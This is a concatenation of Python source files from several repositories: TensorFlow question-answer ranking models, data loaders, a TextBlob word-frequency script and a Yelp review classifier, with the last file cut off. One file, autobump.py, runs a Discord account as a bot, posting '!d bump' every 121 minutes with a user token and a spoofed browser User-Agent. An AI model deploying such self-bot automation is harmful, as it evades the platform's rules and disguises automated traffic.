pooled_len_2 = tf.sqrt(tf.reduce_sum(tf.multiply(pooled_flat_2, pooled_flat_2), 1))
pooled_mul_12 = tf.reduce_sum(tf.multiply(pooled_flat_1, pooled_flat_2), 1)
score = tf.div(pooled_mul_12, tf.multiply(pooled_len_1, pooled_len_2), name="scores")
return score
def wide_convolution(self,embedding):
cnn_outputs = []
for i,filter_size in enumerate(self.filter_sizes):
conv = tf.nn.conv2d(
embedding,
self.kernels[i][0],
strides=[1, 1, self.embedding_size, 1],
padding='SAME',
name="conv-1"
)
h = tf.nn.relu(tf.nn.bias_add(conv, self.kernels[i][1]), name="relu-1")
cnn_outputs.append(h)
cnn_reshaped = tf.concat(cnn_outputs,3)
return cnn_reshaped
def variable_summaries(self,var):
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def build_graph(self):
self.create_placeholder()
self.add_embeddings()
self.para_initial()
self.convolution()
self.pooling_graph()
self.create_loss()
self.create_op()
self.merged = tf.summary.merge_all()
def train(self,sess,data):
feed_dict = {
self.question:data[0],
self.answer:data[1],
self.answer_negative:data[2],
# self.q_mask:data[3],
# self.a_mask:data[4],
# self.a_neg_mask:data[5],
self.dropout_keep_prob_holder:self.dropout_keep_prob
}
_, summary, step, loss, accuracy,score12, score13, see = sess.run(
[self.train_op, self.merged,self.global_step,self.loss, self.accuracy,self.score12,self.score13, self.see],
feed_dict)
return _, summary, step, loss, accuracy,score12, score13, see
def predict(self,sess,data):
feed_dict = {
self.question:data[0],
self.answer:data[1],
# self.q_mask:data[2],
# self.a_mask:data[3],
self.dropout_keep_prob_holder:1.0
}
score = sess.run( self.score12, feed_dict)
return score
if __name__ == '__main__':
cnn = QA_CNN_extend(
max_input_left = 33,
max_input_right = 40,
batch_size = 3,
vocab_size = 5000,
embedding_size = 100,
filter_sizes = [3,4,5],
num_filters = 64,
hidden_size = 100,
dropout_keep_prob = 1.0,
embeddings = None,
l2_reg_lambda = 0.0,
trainable = True,
pooling = 'max',
conv = 'wide')
cnn.build_graph()
input_x_1 = np.reshape(np.arange(3 * 33),[3,33])
input_x_2 = np.reshape(np.arange(3 * 40),[3,40])
input_x_3 = np.reshape(np.arange(3 * 40),[3,40])
q_mask = np.ones((3,33))
a_mask = np.ones((3,40))
a_neg_mask = np.ones((3,40))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
feed_dict = {
cnn.question:input_x_1,
cnn.answer:input_x_2,
# cnn.answer_negative:input_x_3,
cnn.q_mask:q_mask,
cnn.a_mask:a_mask,
cnn.dropout_keep_prob_holder:cnn.dropout_keep
# cnn.a_neg_mask:a_neg_mask
# cnn.q_pos_overlap:q_pos_embedding,
# cnn.q_neg_overlap:q_neg_embedding,
# cnn.a_pos_overlap:a_pos_embedding,
# cnn.a_neg_overlap:a_neg_embedding,
# cnn.q_position:q_position,
# cnn.a_pos_position:a_pos_position,
# cnn.a_neg_position:a_neg_position
}
question,answer,score = sess.run([cnn.question,cnn.answer,cnn.score12],feed_dict)
print( question.shape,answer.shape)
print( score)
|
Python
| 381
| 46.682415
| 147
|
/models/QA_CNN_pairwise.py
| 0.592162
| 0.5751
|
shuishen112/pairwise-rnn
|
refs/heads/master
|
from my.general import flatten, reconstruct, add_wd, exp_mask
import numpy as np
import tensorflow as tf
_BIAS_VARIABLE_NAME = "bias"
_WEIGHTS_VARIABLE_NAME = "kernel"
def linear(args, output_size, bias, bias_start=0.0, scope=None, squeeze=False, wd=0.0, input_keep_prob=1.0,
is_train=None):#, name_w='', name_b=''
# if args is None or (nest.is_sequence(args) and not args):
# raise ValueError("`args` must be specified")
# if not nest.is_sequence(args):
# args = [args]
flat_args = [flatten(arg, 1) for arg in args]#[210,20]
# if input_keep_prob < 1.0:
# assert is_train is not None
flat_args = [tf.nn.dropout(arg, input_keep_prob) for arg in flat_args]
total_arg_size = 0#[60]
shapes = [a.get_shape() for a in flat_args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
if shape[1].value is None:
raise ValueError("linear expects shape[1] to be provided for shape %s, "
"but saw %s" % (shape, shape[1]))
else:
total_arg_size += shape[1].value
# print(total_arg_size)
# exit()
dtype = [a.dtype for a in flat_args][0]
# scope = tf.get_variable_scope()
with tf.variable_scope(scope) as outer_scope:
weights = tf.get_variable(_WEIGHTS_VARIABLE_NAME, [total_arg_size, output_size], dtype=dtype)
if len(flat_args) == 1:
res = tf.matmul(flat_args[0], weights)
else:
res = tf.matmul(tf.concat(flat_args, 1), weights)
if not bias:
flat_out = res
else:
with tf.variable_scope(outer_scope) as inner_scope:
inner_scope.set_partitioner(None)
biases = tf.get_variable(
_BIAS_VARIABLE_NAME, [output_size],
dtype=dtype,
initializer=tf.constant_initializer(bias_start, dtype=dtype))
flat_out = tf.nn.bias_add(res, biases)
out = reconstruct(flat_out, args[0], 1)
if squeeze:
out = tf.squeeze(out, [len(args[0].get_shape().as_list())-1])
if wd:
add_wd(wd)
return out
def softmax(logits, mask=None, scope=None):
with tf.name_scope(scope or "Softmax"):
if mask is not None:
logits = exp_mask(logits, mask)
flat_logits = flatten(logits, 1)
flat_out = tf.nn.softmax(flat_logits)
out = reconstruct(flat_out, logits, 1)
return out
def softsel(target, logits, mask=None, scope=None):
"""
:param target: [ ..., J, d] dtype=float
:param logits: [ ..., J], dtype=float
:param mask: [ ..., J], dtype=bool
:param scope:
:return: [..., d], dtype=float
"""
with tf.name_scope(scope or "Softsel"):
a = softmax(logits, mask = mask)
target_rank = len(target.get_shape().as_list())
out = tf.reduce_sum(tf.expand_dims(a, -1) * target, target_rank - 2)
return out
def highway_layer(arg, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
with tf.variable_scope(scope or "highway_layer"):
d = arg.get_shape()[-1]
trans = linear([arg], d, bias, bias_start=bias_start, scope='trans', wd=wd, input_keep_prob=input_keep_prob)
trans = tf.nn.relu(trans)
gate = linear([arg], d, bias, bias_start=bias_start, scope='gate', wd=wd, input_keep_prob=input_keep_prob)
gate = tf.nn.sigmoid(gate)
out = gate * trans + (1 - gate) * arg
return out
def highway_network(arg, num_layers, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
with tf.variable_scope(scope or "highway_network"):
prev = arg
cur = None
for layer_idx in range(num_layers):
cur = highway_layer(prev, bias, bias_start=bias_start, scope="layer_{}".format(layer_idx), wd=wd,
input_keep_prob=input_keep_prob)
prev = cur
return cur
def conv1d(in_, filter_size, height, padding, keep_prob=1.0, scope=None):
with tf.variable_scope(scope or "conv1d"):
num_channels = in_.get_shape()[-1]
filter_ = tf.get_variable("filter", shape=[1, height, num_channels, filter_size], dtype='float')
bias = tf.get_variable("bias", shape=[filter_size], dtype='float')
strides = [1, 1, 1, 1]
in_ = tf.nn.dropout(in_, keep_prob)
xxc = tf.nn.conv2d(in_, filter_, strides, padding) + bias # [N*M, JX, W/filter_stride, d]
out = tf.reduce_max(tf.nn.relu(xxc), 2) # [-1, JX, d]
return out
def multi_conv1d(in_, filter_sizes, heights, padding, keep_prob=1.0, scope=None):
with tf.variable_scope(scope or "multi_conv1d"):
assert len(filter_sizes) == len(heights)
outs = []
for filter_size, height in zip(filter_sizes, heights):
if filter_size == 0:
continue
out = conv1d(in_, filter_size, height, padding, keep_prob=keep_prob, scope="conv1d_{}".format(height))
outs.append(out)
concat_out = tf.concat(outs, axis=2)
return concat_out
if __name__ == '__main__':
a = tf.Variable(np.random.random(size=(2,2,4)))
b = tf.Variable(np.random.random(size=(2,3,4)))
c = tf.tile(tf.expand_dims(a, 2), [1, 1, 3, 1])
test = flatten(c,1)
out = reconstruct(test, c, 1)
d = tf.tile(tf.expand_dims(b, 1), [1, 2, 1, 1])
e = linear([c,d,c*d],1,bias = False,scope = "test",)
# f = softsel(d, e)
with tf.Session() as sess:
tf.global_variables_initializer().run()
print(sess.run(test))
print(sess.run(tf.shape(out)))
exit()
print(sess.run(tf.shape(a)))
print(sess.run(a))
print(sess.run(tf.shape(b)))
print(sess.run(b))
print(sess.run(tf.shape(c)))
print(sess.run(c))
print(sess.run(tf.shape(d)))
print(sess.run(d))
print(sess.run(tf.shape(e)))
print(sess.run(e))
|
Python
| 160
| 36.712502
| 116
|
/models/my/nn.py
| 0.572754
| 0.558005
|
shuishen112/pairwise-rnn
|
refs/heads/master
|
from .QA_CNN_pairwise import QA_CNN_extend as CNN
from .QA_RNN_pairwise import QA_RNN_extend as RNN
from .QA_CNN_quantum_pairwise import QA_CNN_extend as QCNN
def setup(opt):
if opt["model_name"]=="cnn":
model=CNN(opt)
elif opt["model_name"]=="rnn":
model=RNN(opt)
elif opt['model_name']=='qcnn':
model=QCNN(opt)
else:
print("no model")
exit(0)
return model
|
Python
| 14
| 25.642857
| 58
|
/models/__init__.py
| 0.691689
| 0.689008
|
shuishen112/pairwise-rnn
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from tensorflow import flags
import tensorflow as tf
from config import Singleton
import data_helper
import datetime
import os
import models
import numpy as np
import evaluation
from data_helper import log_time_delta,getLogger
logger=getLogger()
args = Singleton().get_rnn_flag()
#args = Singleton().get_8008_flag()
args._parse_flags()
opts=dict()
logger.info("\nParameters:")
for attr, value in sorted(args.__flags.items()):
logger.info(("{}={}".format(attr.upper(), value)))
opts[attr]=value
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
logger.info('the number of words :%d '%len(alphabet))
if args.data=="quora" or args.data=="8008" :
print("cn embedding")
embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
train_data_loader = data_helper.getBatch48008
else:
embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
train_data_loader = data_helper.get_mini_batch
opts["embeddings"] =embedding
opts["vocab_size"]=len(alphabet)
opts["max_input_right"]=a_max_sent_length
opts["max_input_left"]=q_max_sent_length
opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
print("innitilize over")
#with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
with tf.Graph().as_default():
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model=models.setup(opts)
model.build_graph()
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer()) # fun first than print or save
ckpt = tf.train.get_checkpoint_state("checkpoint")
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
print(sess.run(model.position_embedding)[0])
if os.path.exists("model") :
import shutil
shutil.rmtree("model")
builder = tf.saved_model.builder.SavedModelBuilder("./model")
builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
builder.save(True)
variable_averages = tf.train.ExponentialMovingAverage( model)
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
for name in variables_to_restore:
print(name)
@log_time_delta
def predict(model,sess,batch,test):
scores = []
for data in batch:
score = model.predict(sess,data)
scores.extend(score)
return np.array(scores[:len(test)])
text = "怎么 提取 公积金 ?"
splited_text=data_helper.encode_to_split(text,alphabet)
mb_q,mb_q_mask = data_helper.prepare_data([splited_text])
mb_a,mb_a_mask = data_helper.prepare_data([splited_text])
data = (mb_q,mb_a,mb_q_mask,mb_a_mask)
score = model.predict(sess,data)
print(score)
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.q_mask:data[2],
model.a_mask:data[3],
model.dropout_keep_prob_holder:1.0
}
sess.run(model.position_embedding,feed_dict=feed_dict)[0]
|
Python
| 114
| 31.622807
| 92
|
/test.py
| 0.651019
| 0.64324
|
shuishen112/pairwise-rnn
|
refs/heads/master
|
#-*- coding:utf-8 -*-
import os
import numpy as np
import tensorflow as tf
import string
from collections import Counter
import pandas as pd
from tqdm import tqdm
import random
from functools import wraps
import time
import pickle
def log_time_delta(func):
@wraps(func)
def _deco(*args, **kwargs):
start = time.time()
ret = func(*args, **kwargs)
end = time.time()
delta = end - start
print( "%s runed %.2f seconds"% (func.__name__,delta))
return ret
return _deco
import tqdm
from nltk.corpus import stopwords
OVERLAP = 237
class Alphabet(dict):
def __init__(self, start_feature_id = 1):
self.fid = start_feature_id
def add(self, item):
idx = self.get(item, None)
if idx is None:
idx = self.fid
self[item] = idx
# self[idx] = item
self.fid += 1
return idx
def dump(self, fname):
with open(fname, "w") as out:
for k in sorted(self.keys()):
out.write("{}\t{}\n".format(k, self[k]))
def cut(sentence):
tokens = sentence.lower().split()
# tokens = [w for w in tokens if w not in stopwords.words('english')]
return tokens
@log_time_delta
def load(dataset, filter = False):
data_dir = "data/" + dataset
datas = []
for data_name in ['train.txt','test.txt','dev.txt']:
data_file = os.path.join(data_dir,data_name)
data = pd.read_csv(data_file,header = None,sep="\t",names=["question","answer","flag"]).fillna('0')
# data = pd.read_csv(data_file,header = None,sep="\t",names=["question","answer","flag"],quoting =3).fillna('0')
if filter == True:
datas.append(removeUnanswerdQuestion(data))
else:
datas.append(data)
# sub_file = os.path.join(data_dir,'submit.txt')
# submit = pd.read_csv(sub_file,header = None,sep = "\t",names = ['question','answer'],quoting = 3)
# datas.append(submit)
return tuple(datas)
@log_time_delta
def removeUnanswerdQuestion(df):
counter= df.groupby("question").apply(lambda group: sum(group["flag"]))
questions_have_correct=counter[counter>0].index
counter= df.groupby("question").apply(lambda group: sum(group["flag"]==0))
questions_have_uncorrect=counter[counter>0].index
counter=df.groupby("question").apply(lambda group: len(group["flag"]))
questions_multi=counter[counter>1].index
return df[df["question"].isin(questions_have_correct) & df["question"].isin(questions_have_correct) & df["question"].isin(questions_have_uncorrect)].reset_index()
@log_time_delta
def get_alphabet(corpuses=None,dataset=""):
pkl_name="temp/"+dataset+".alphabet.pkl"
if os.path.exists(pkl_name):
return pickle.load(open(pkl_name,"rb"))
alphabet = Alphabet(start_feature_id = 0)
alphabet.add('[UNK]')
alphabet.add('END')
count = 0
for corpus in corpuses:
for texts in [corpus["question"].unique(),corpus["answer"]]:
for sentence in texts:
tokens = cut(sentence)
for token in set(tokens):
alphabet.add(token)
print("alphabet size %d" % len(alphabet.keys()) )
if not os.path.exists("temp"):
os.mkdir("temp")
pickle.dump( alphabet,open(pkl_name,"wb"))
return alphabet
@log_time_delta
def getSubVectorsFromDict(vectors,vocab,dim = 300):
embedding = np.zeros((len(vocab),dim))
count = 1
for word in vocab:
if word in vectors:
count += 1
embedding[vocab[word]]= vectors[word]
else:
embedding[vocab[word]]= np.random.uniform(-0.5,+0.5,dim)#vectors['[UNKNOW]'] #.tolist()
print( 'word in embedding',count)
return embedding
def encode_to_split(sentence,alphabet):
indices = []
tokens = cut(sentence)
seq = [alphabet[w] if w in alphabet else alphabet['[UNK]'] for w in tokens]
return seq
@log_time_delta
def load_text_vec(alphabet,filename="",embedding_size = 100):
vectors = {}
with open(filename,encoding='utf-8') as f:
i = 0
for line in f:
i += 1
if i % 100000 == 0:
print( 'epch %d' % i)
items = line.strip().split(' ')
if len(items) == 2:
vocab_size, embedding_size= items[0],items[1]
print( ( vocab_size, embedding_size))
else:
word = items[0]
if word in alphabet:
vectors[word] = items[1:]
print( 'embedding_size',embedding_size)
print( 'done')
print( 'words found in wor2vec embedding ',len(vectors.keys()))
return vectors
@log_time_delta
def get_embedding(alphabet,dim = 300,language ="en",dataset=""):
pkl_name="temp/"+dataset+".subembedding.pkl"
if os.path.exists(pkl_name):
return pickle.load(open(pkl_name,"rb"))
if language=="en":
fname = 'embedding/glove.6B/glove.6B.300d.txt'
else:
fname= "embedding/embedding.200.header_txt"
embeddings = load_text_vec(alphabet,fname,embedding_size = dim)
sub_embeddings = getSubVectorsFromDict(embeddings,alphabet,dim)
pickle.dump( sub_embeddings,open(pkl_name,"wb"))
return sub_embeddings
@log_time_delta
def get_mini_batch_test(df,alphabet,batch_size):
q = []
a = []
pos_overlap = []
for index,row in df.iterrows():
question = encode_to_split(row["question"],alphabet)
answer = encode_to_split(row["answer"],alphabet)
overlap_pos = overlap_index(row['question'],row['answer'])
q.append(question)
a.append(answer)
pos_overlap.append(overlap_pos)
m = 0
n = len(q)
idx_list = np.arange(m,n,batch_size)
mini_batches = []
for idx in idx_list:
mini_batches.append(np.arange(idx,min(idx + batch_size,n)))
for mini_batch in mini_batches:
mb_q = [ q[t] for t in mini_batch]
mb_a = [ a[t] for t in mini_batch]
mb_pos_overlap = [pos_overlap[t] for t in mini_batch]
mb_q,mb_q_mask = prepare_data(mb_q)
mb_a,mb_pos_overlaps = prepare_data(mb_a,mb_pos_overlap)
yield(mb_q,mb_a)
# calculate the overlap_index
def overlap_index(question,answer,stopwords = []):
ans_token = cut(answer)
qset = set(cut(question))
aset = set(ans_token)
a_len = len(ans_token)
# q_index = np.arange(1,q_len)
a_index = np.arange(1,a_len + 1)
overlap = qset.intersection(aset)
# for i,q in enumerate(cut(question)[:q_len]):
# value = 1
# if q in overlap:
# value = 2
# q_index[i] = value
for i,a in enumerate(ans_token):
if a in overlap:
a_index[i] = OVERLAP
return a_index
def getBatch48008(df,alphabet,batch_size,sort_by_len = True,shuffle = False):
q,a,neg_a=[],[],[]
answers=df["answer"][:250]
ground_truth=df.groupby("question").apply(lambda group: group[group.flag==1].index[0]%250 ).to_dict()
for question in tqdm(df['question'].unique()):
index= ground_truth[question]
canindates = [i for i in range(250)]
canindates.remove(index)
a_neg_index = random.choice(canindates)
seq_q = encode_to_split(question,alphabet)
seq_a = encode_to_split(answers[index],alphabet)
seq_neg_a = encode_to_split(answers[a_neg_index],alphabet)
q.append(seq_q)
a.append( seq_a)
neg_a.append(seq_neg_a )
return iteration_batch(q,a,neg_a,batch_size,sort_by_len,shuffle)
def iteration_batch(q,a,neg_a,batch_size,sort_by_len = True,shuffle = False):
if sort_by_len:
sorted_index = sorted(range(len(q)), key=lambda x: len(q[x]), reverse=True)
q = [ q[i] for i in sorted_index]
a = [a[i] for i in sorted_index]
neg_a = [ neg_a[i] for i in sorted_index]
pos_overlap = [pos_overlap[i] for i in sorted_index]
neg_overlap = [neg_overlap[i] for i in sorted_index]
#get batch
m = 0
n = len(q)
idx_list = np.arange(m,n,batch_size)
if shuffle:
np.random.shuffle(idx_list)
mini_batches = []
for idx in idx_list:
mini_batches.append(np.arange(idx,min(idx + batch_size,n)))
for mini_batch in tqdm(mini_batches):
mb_q = [ q[t] for t in mini_batch]
mb_a = [ a[t] for t in mini_batch]
mb_neg_a = [ neg_a[t] for t in mini_batch]
mb_pos_overlap = [pos_overlap[t] for t in mini_batch]
mb_neg_overlap = [neg_overlap[t] for t in mini_batch]
mb_q,mb_q_mask = prepare_data(mb_q)
mb_a,mb_pos_overlaps = prepare_data(mb_a,mb_pos_overlap)
mb_neg_a,mb_neg_overlaps = prepare_data(mb_neg_a,mb_neg_overlap)
# mb_a,mb_a_mask = prepare_data(mb_a,mb_pos_overlap)
# mb_neg_a , mb_a_neg_mask = prepare_data(mb_neg_a)
yield(mb_q,mb_a,mb_neg_a,mb_q_mask,mb_a_mask,mb_a_neg_mask)
def get_mini_batch(df,alphabet,batch_size,sort_by_len = True,shuffle = False,model=None,sess=None):
q = []
a = []
neg_a = []
for question in df['question'].unique():
# group = df[df["question"]==question]
# pos_answers = group[df["flag"] == 1]["answer"]
# neg_answers = group[df["flag"] == 0]["answer"].reset_index()
group = df[df["question"]==question]
pos_answers = group[group["flag"] == 1]["answer"]
neg_answers = group[group["flag"] == 0]["answer"]#.reset_index()
for pos in pos_answers:
if model is not None and sess is not None:
pos_sent= encode_to_split(pos,alphabet)
q_sent,q_mask= prepare_data([pos_sent])
neg_sents = [encode_to_split(sent,alphabet) for sent in neg_answers]
a_sent,a_mask= prepare_data(neg_sents)
scores = model.predict(sess,(np.tile(q_sent,(len(neg_answers),1)),a_sent,np.tile(q_mask,(len(neg_answers),1)),a_mask))
neg_index = scores.argmax()
else:
if len(neg_answers.index) > 0:
neg_index = np.random.choice(neg_answers.index)
neg = neg_answers.reset_index().loc[neg_index,]["answer"]
seq_q = encode_to_split(question,alphabet)
seq_a = encode_to_split(pos,alphabet)
seq_neg_a = encode_to_split(neg,alphabet)
q.append(seq_q)
a.append(seq_a)
neg_a.append(seq_neg_a)
return iteration_batch(q,a,neg_a,batch_size,sort_by_len,shuffle)
def prepare_data(seqs,overlap = None):
lengths = [len(seq) for seq in seqs]
n_samples = len(seqs)
max_len = np.max(lengths)
x = np.zeros((n_samples,max_len)).astype('int32')
if overlap is not None:
overlap_position = np.zeros((n_samples,max_len)).astype('float')
for idx ,seq in enumerate(seqs):
x[idx,:lengths[idx]] = seq
overlap_position[idx,:lengths[idx]] = overlap[idx]
return x,overlap_position
else:
x_mask = np.zeros((n_samples, max_len)).astype('float')
for idx, seq in enumerate(seqs):
x[idx, :lengths[idx]] = seq
x_mask[idx, :lengths[idx]] = 1.0
# print( x, x_mask)
return x, x_mask
# def prepare_data(seqs):
# lengths = [len(seq) for seq in seqs]
# n_samples = len(seqs)
# max_len = np.max(lengths)
# x = np.zeros((n_samples, max_len)).astype('int32')
# x_mask = np.zeros((n_samples, max_len)).astype('float')
# for idx, seq in enumerate(seqs):
# x[idx, :lengths[idx]] = seq
# x_mask[idx, :lengths[idx]] = 1.0
# # print( x, x_mask)
# return x, x_mask
def getLogger():
import sys
import logging
import os
import time
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
log_filename = "log/" +time.strftime("%Y%m%d", timeArray)
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
if not os.path.exists(log_filename):
os.mkdir(log_filename)
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa'+timeStamp+'.log',filemode='w')
logging.root.setLevel(level=logging.INFO)
logger.info("running %s" % ' '.join(sys.argv))
return logger
|
Python
| 363
| 33.487602
| 167
|
/data_helper.py
| 0.582389
| 0.574804
|
pablor0mero/Placester_Test_Pablo_Romero
|
refs/heads/master
|
# For this solution I'm using TextBlob, using it's integration with WordNet.
from textblob import TextBlob
from textblob import Word
from textblob.wordnet import VERB
import nltk
import os
import sys
import re
import json
results = { "results" : [] }
#Override NLTK data path to use the one I uploaded in the folder
dir_path = os.path.dirname(os.path.realpath(__file__))
nltk_path = dir_path + os.path.sep + "nltk_data"
nltk.data.path= [nltk_path]
#Text to analyze
TEXT = """
Take this paragraph of text and return an alphabetized list of ALL unique words. A unique word is any form of a word often communicated
with essentially the same meaning. For example,
fish and fishes could be defined as a unique word by using their stem fish. For each unique word found in this entire paragraph,
determine the how many times the word appears in total.
Also, provide an analysis of what sentence index position or positions the word is found.
The following words should not be included in your analysis or result set: "a", "the", "and", "of", "in", "be", "also" and "as".
Your final result MUST be displayed in a readable console output in the same format as the JSON sample object shown below.
"""
TEXT = TEXT.lower()
WORDS_NOT_TO_CONSIDER = ["a", "the", "and", "of", "in", "be", "also", "as"]
nlpText= TextBlob(TEXT)
def getSentenceIndexesForWord(word, sentences):
sentenceIndexes = []
for index, sentence in enumerate(sentences):
count = sum(1 for _ in re.finditer(r'\b%s\b' % re.escape(word.lower()), sentence))
if count > 0:
sentenceIndexes.append(index)
return sentenceIndexes
#1: Get all words, excluding repetitions and all the sentences in the text
nlpTextWords = sorted(set(nlpText.words))
nlpTextSentences = nlpText.raw_sentences
#2 Get results
synonymsList = []
allreadyReadWords = []
for word in nlpTextWords:
if word not in WORDS_NOT_TO_CONSIDER and word not in allreadyReadWords:
timesInText = nlpText.word_counts[word]
#Get sentence indexes where the word can be found
sentenceIndexes = getSentenceIndexesForWord(word, nlpTextSentences)
#Check for synonyms
for word2 in nlpTextWords:
if word2 not in WORDS_NOT_TO_CONSIDER and ( word.lower() != word2.lower() and len(list(set(word.synsets) & set(word2.synsets))) > 0 ):
#If I find a synonym of the word I add it to the list of words allready read and add the times that synonym appeared in the text to the total
#count of the unique word and the corresponding sentence indexes
allreadyReadWords.append(word2)
timesInText = timesInText + nlpText.word_counts[word2]
sentenceIndexes += getSentenceIndexesForWord(word2,nlpTextSentences)
allreadyReadWords.append(word)
results["results"].append({"word" : word.lemmatize(), #I return the lemma of the word because TextBlob's stems seem to be wrong for certain words
"total-occurances": timesInText,
"sentence-indexes": sorted(set(sentenceIndexes))})
print(json.dumps(results, indent=4))
|
Python
| 71
| 44.929577
| 157
|
/main.py
| 0.670813
| 0.666869
|
GabinCleaver/Auto_Discord_Bump
|
refs/heads/main
|
import requests
import time
token = "TOKEN"
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Authorization' : token
}
id = input(f"[?] Salon ID: ")
print("")
while True:
requests.post(
f"https://discord.com/api/channels/{id}/messages",
headers = headers,
json = {"content" : "!d bump"}
)
print("[+] Serveur Bumpé")
time.sleep(121 * 60)
|
Python
| 21
| 20.809525
| 109
|
/autobump.py
| 0.561845
| 0.51153
|
altopalido/yelp_python
|
refs/heads/master
|
# Madis Settings
MADIS_PATH='/Users/alexiatopalidou/Desktop/erg/madis/src'
# Webserver Settings
# IMPORTANT: The port must be available.
web_port = 9090 # must be integer (this is wrong:'9090')
|
Python
| 6
| 31.666666
| 57
|
/yelp_python/settings.py
| 0.75
| 0.709184
|
altopalido/yelp_python
|
refs/heads/master
|
# ----- CONFIGURE YOUR EDITOR TO USE 4 SPACES PER TAB ----- #
import settings
import sys
def connection():
''' User this function to create your connections '''
import sys
sys.path.append(settings.MADIS_PATH)
import madis
con = madis.functions.Connection('/Users/alexiatopalidou/Desktop/erg/yelp_python/yelp.db')
return con
def classify_review(reviewid):
#check for compatible data type
try:
val=str(reviewid)
except ValueError:
return [("Error! Insert correct data type.")]
# Create a new connection
global con
con=connection()
# Create cursors on the connection
#alternative: create the desired list after every textwindow, posterms, negterms query
cur=con.cursor()
cura=con.cursor()
curb=con.cursor()
cur1=con.cursor()
cur2=con.cursor()
#check for existance of given data inside the yelp.db
curcheck=con.cursor()
cur.execute("SELECT var('reviewid',?)",(reviewid,))
check=curcheck.execute("SELECT review_id from reviews where review_id=?",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Review id.",)]
#sql query with textwindow - one for each occasion (terms with 1, 2 or 3 words)
res=cur.execute("SELECT textwindow(text,0,0,1) from reviews where review_id=var('reviewid');")
resa=cura.execute("SELECT textwindow(text,0,0,2) from reviews where review_id=var('reviewid');")
resb=curb.execute("SELECT textwindow(text,0,0,3) from reviews where review_id=var('reviewid');")
#get positive/negative terms
res1=cur1.execute("SELECT * from posterms;")
res2=cur2.execute("SELECT * from negterms;")
#create lists that store a)all reviews terms, b)positive terms and c)negative terms
k=[]
for n in res:
k.append(n)
for n in resa:
k.append(n)
for n in resb:
k.append(n)
m=[]
for z in res1:
m.append(z)
o=[]
for p in res2:
o.append(p)
#check if the review is positive or negative
x=0
for i in k:
for j in m:
if i==j:
x=x+1
y=0
for i in k:
for j in o:
if i==j:
y=y+1
if x>y:
rsl='positive'
elif x<y:
rsl='negative'
else:
rsl='neutral'
#return a list with the results
res=cur.execute("SELECT b.name, ? from business b, reviews r where r.business_id=b.business_id and r.review_id=?",(rsl, val,))
l=[("business_name","result")]
for i in res:
l.append(i)
return l
def classify_review_plain_sql(reviewid):
# Create a new connection
con=connection()
# Create a cursor on the connection
cur=con.cursor()
return [("business_name","result")]
def updatezipcode(business_id,zipcode):
#check for compatible data type
try:
val=str(business_id)
val2=int(zipcode)
except ValueError:
return [("Error! Insert correct data type.",)]
# Create a new connection
global con
con=connection()
# Create a cursor on the connection
cur=con.cursor()
#check for existance of given data inside the yelp.db or allowance of data value
curcheck=con.cursor()
cur.execute("select var('business_id',?)", (val,))
check=curcheck.execute("SELECT business_id from business where business_id=?;",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Business Id.",)]
if val2>99999999999999999999: #we do not actually need that
return [("Error! Insert valid Zip code.",)]
#execute main sql query
res=cur.execute("UPDATE business set zip_code=? where business_id=?;",(val2,val,))
#return ok or comment that return and de-comment the bottom return for the business_id and the new zip_code
return [('ok',)]
#res=cur.execute("SELECT business_id, zip_code from business where business_id=?;",(val,))
#l=[("business_id", "zip_code"),]
#for i in res:
# l.append(i)
#return l
def selectTopNbusinesses(category_id,n):
#check for compatible data type
try:
val=int(category_id)
val2=int(n)
except ValueError:
return [("Error! Insert correct data type",)]
# Create a new connection
global con
con=connection()
# Create a cursor on the connection
cur=con.cursor()
#check for existance of given data inside the yelp.db
curcheck=con.cursor()
cur.execute("SELECT var('category_id',?)", (val,))
check=curcheck.execute("SELECT category_id from category where category_id=?;",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Category Id.",)]
if val2<0:
return [("Error! Choose >=0 businesses to return.",)]
#execute main sql query
res=cur.execute("SELECT b.business_id, count(rpn.positive) from reviews_pos_neg rpn, reviews r, business b, business_category bc, category c where rpn.review_id=r.review_id and r.business_id=b.business_id and b.business_id=bc.business_id and bc.category_id=c.category_id and c.category_id=? group by b.business_id order by count(rpn.positive) desc;",(val,))
#return a list with the results
l=[("business_id", "number_of_reviews",)]
for i in res:
l.append(i)
return l[0:val2+1]
def traceUserInfuence(userId,depth):
